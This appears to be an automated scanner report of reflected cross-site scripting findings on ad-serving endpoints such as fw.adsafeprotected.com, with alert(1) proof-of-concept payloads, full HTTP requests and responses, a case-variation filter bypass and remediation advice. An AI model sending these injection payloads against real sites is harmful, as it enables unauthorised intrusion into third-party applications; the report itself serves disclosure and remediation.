HTTP/1.1 404 Not Found Content-Type: text/javascript P3P: policyref="http://cdn.krxd.net/kruxcontent/p3p.xml", CP="NON DSP COR NID OUR DEL SAM OTR UNR COM NAV INT DEM CNT STA PRE LOC OTC" Server: TornadoServer/1.2 X-Config-Cache: Miss X-Request-Time: D=6418 t=1317596563377195 X-Served-By: logger-b010.krxd.net Content-Length: 90 Date: Sun, 02 Oct 2011 23:02:43 GMT Connection: close
{"error": "Non existant site for NBCU - nbc.com43357<script>alert(1)</script>fb7066d837f"}
The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 325e7<script>alert(1)</script>a9904873cf7 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload be217<ScRiPt>alert(1)</ScRiPt>82ac448e49a was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
The value of the plc request parameter is copied into the HTML document as plain text between tags. The payload 4036d<ScRiPt>alert(1)</ScRiPt>bbebc658ed7 was submitted in the plc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 82338<script>alert(1)</script>8a2042977e9 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21a5b"-alert(1)-"cf6c3bde548 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com21a5b"-alert(1)-"cf6c3bde548/10736/9003/ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=160&h=600&plc=tl&js=10 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=11B64D8D9D272DE8A43EFE7C4D5C852F; Path=/ Content-Type: text/javascript Date: Sun, 02 Oct 2011 23:14:27 GMT Connection: close
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b25cf"-alert(1)-"a31adad7d99 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10736b25cf"-alert(1)-"a31adad7d99/9003/ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=160&h=600&plc=tl&js=10 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=3D9E116716B31F26EB9E0256A2AECFB4; Path=/ Content-Type: text/javascript Date: Sun, 02 Oct 2011 23:14:26 GMT Connection: close
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bdd46"-alert(1)-"c6cd25a3354 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10736/9003bdd46"-alert(1)-"c6cd25a3354/ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=160&h=600&plc=tl&js=10 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=A7A81A0864A745D379F44373497C459F; Path=/ Content-Type: text/javascript Date: Sun, 02 Oct 2011 23:14:27 GMT Connection: close
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3eef7"-alert(1)-"1d88e456200 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10736/9003/ca3eef7"-alert(1)-"1d88e456200?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=160&h=600&plc=tl&js=10 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=539BEF821B32F03F7864DA8C43B8EB3C; Path=/ Content-Type: text/javascript Date: Sun, 02 Oct 2011 23:14:27 GMT Connection: close
The value of the aid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81099"-alert(1)-"c11bf68dfae was submitted in the aid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10736/9003/ca?pid=hp01&aid=hp0281099"-alert(1)-"c11bf68dfae&cid=72186705&c=cachebuster&w=160&h=600&plc=tl&js=10 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=B9C15A61E5DE496D1856F47CA2AF9D91; Path=/ Content-Type: text/javascript Date: Sun, 02 Oct 2011 23:14:24 GMT Connection: close
The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77053"-alert(1)-"66938031c38 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10736/9003/ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster77053"-alert(1)-"66938031c38&w=160&h=600&plc=tl&js=10 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=0C9E27AE0A1A8CE55C6C997B4A1CB1CA; Path=/ Content-Type: text/javascript Date: Sun, 02 Oct 2011 23:14:25 GMT Connection: close
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54890"-alert(1)-"132ffc34b47 was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10736/9003/ca?pid=hp01&aid=hp02&cid=7218670554890"-alert(1)-"132ffc34b47&c=cachebuster&w=160&h=600&plc=tl&js=10 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=F76C28019C0B902E488281B56C58A584; Path=/ Content-Type: text/javascript Date: Sun, 02 Oct 2011 23:14:24 GMT Connection: close
The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1487a"-alert(1)-"7e0b3b23f54 was submitted in the h parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10736/9003/ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=160&h=6001487a"-alert(1)-"7e0b3b23f54&plc=tl&js=10 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=FBF5954A26F5D03F6085B2EC13D8F0DF; Path=/ Content-Type: text/javascript Date: Sun, 02 Oct 2011 23:14:26 GMT Connection: close
The value of the js request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fbc1f"-alert(1)-"4fc8df959c1 was submitted in the js parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10736/9003/ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=160&h=600&plc=tl&js=10fbc1f"-alert(1)-"4fc8df959c1 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=FFB5C4265780750837806A89B2B0B812; Path=/ Content-Type: text/javascript Date: Sun, 02 Oct 2011 23:14:26 GMT Connection: close
2.48. http://fw.adsafeprotected.com/rjss/choices.truste.com/10736/9003/ca [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://fw.adsafeprotected.com
Path:
/rjss/choices.truste.com/10736/9003/ca
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0cbc"-alert(1)-"817e5b6934b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10736/9003/ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=160&h=600&plc=tl&js=10&f0cbc"-alert(1)-"817e5b6934b=1 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/javascript Date: Sun, 02 Oct 2011 23:14:26 GMT Connection: close
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb9a7"-alert(1)-"910b8bf640d was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10736/9003/ca?pid=hp01bb9a7"-alert(1)-"910b8bf640d&aid=hp02&cid=72186705&c=cachebuster&w=160&h=600&plc=tl&js=10 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=0804C1A00E565ECBE0A9E02DA2A4CE2F; Path=/ Content-Type: text/javascript Date: Sun, 02 Oct 2011 23:14:24 GMT Connection: close
The value of the plc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f40e3"-alert(1)-"d0ecdf8d0fd was submitted in the plc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10736/9003/ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=160&h=600&plc=tlf40e3"-alert(1)-"d0ecdf8d0fd&js=10 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=51394304C5191E0560BE30CA720D99CC; Path=/ Content-Type: text/javascript Date: Sun, 02 Oct 2011 23:14:25 GMT Connection: close
The value of the w request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45685"-alert(1)-"e066e44082e was submitted in the w parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10736/9003/ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=16045685"-alert(1)-"e066e44082e&h=600&plc=tl&js=10 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=0AD7A3C7C2D8D6EB41AF3CA6593E2046; Path=/ Content-Type: text/javascript Date: Sun, 02 Oct 2011 23:14:25 GMT Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72461"-alert(1)-"68fd0dd1600 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/dc72461"-alert(1)-"68fd0dd1600/10736/179733/adj/N5823.8705.MLB/B5918949.10;sz=160x600;ord=6927014? HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=8A6B259E16FBA90FC9313AAB1BDF8F6A; Path=/ Content-Type: text/javascript Date: Sun, 02 Oct 2011 23:14:25 GMT Connection: close
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e8e4"-alert(1)-"66c74cdde76 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/dc/107361e8e4"-alert(1)-"66c74cdde76/179733/adj/N5823.8705.MLB/B5918949.10;sz=160x600;ord=6927014? HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=B49B44617777455C1C06DF0D1A12D42A; Path=/ Content-Type: text/javascript Date: Sun, 02 Oct 2011 23:14:25 GMT Connection: close
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae470"-alert(1)-"6c0de5df76c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/dc/10736/179733ae470"-alert(1)-"6c0de5df76c/adj/N5823.8705.MLB/B5918949.10;sz=160x600;ord=6927014? HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=117F352BB6F22F325C438328E8790655; Path=/ Content-Type: text/javascript Date: Sun, 02 Oct 2011 23:14:26 GMT Connection: close
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd9d6"-alert(1)-"2b09f5fcdaa was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/dc/10736/179733/adjfd9d6"-alert(1)-"2b09f5fcdaa/N5823.8705.MLB/B5918949.10;sz=160x600;ord=6927014? HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=9F7C04BA304238499B9F7B8E8EBE8D90; Path=/ Content-Type: text/javascript Date: Sun, 02 Oct 2011 23:14:26 GMT Connection: close
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd555"-alert(1)-"ab026152e04 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/dc/10736/179733/adj/N5823.8705.MLBbd555"-alert(1)-"ab026152e04/B5918949.10;sz=160x600;ord=6927014? HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=B14D2E67FEF476D1EC90A153ECC57EEE; Path=/ Content-Type: text/javascript Date: Sun, 02 Oct 2011 23:14:26 GMT Connection: close
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50477"-alert(1)-"b76bea173ee was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.1050477"-alert(1)-"b76bea173ee;sz=160x600;ord=6927014? HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/javascript Date: Sun, 02 Oct 2011 23:14:26 GMT Connection: close
2.58. http://fw.adsafeprotected.com/rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7cd1"-alert(1)-"02a8dfc6b5d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/dc/10736/179733/adj/N5823.8705.MLB/B5918949.10;sz=160x600;ord=6927014?&c7cd1"-alert(1)-"02a8dfc6b5d=1 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/javascript Date: Sun, 02 Oct 2011 23:14:25 GMT Connection: close
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72171"-alert(1)-"9f07e37a40c was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
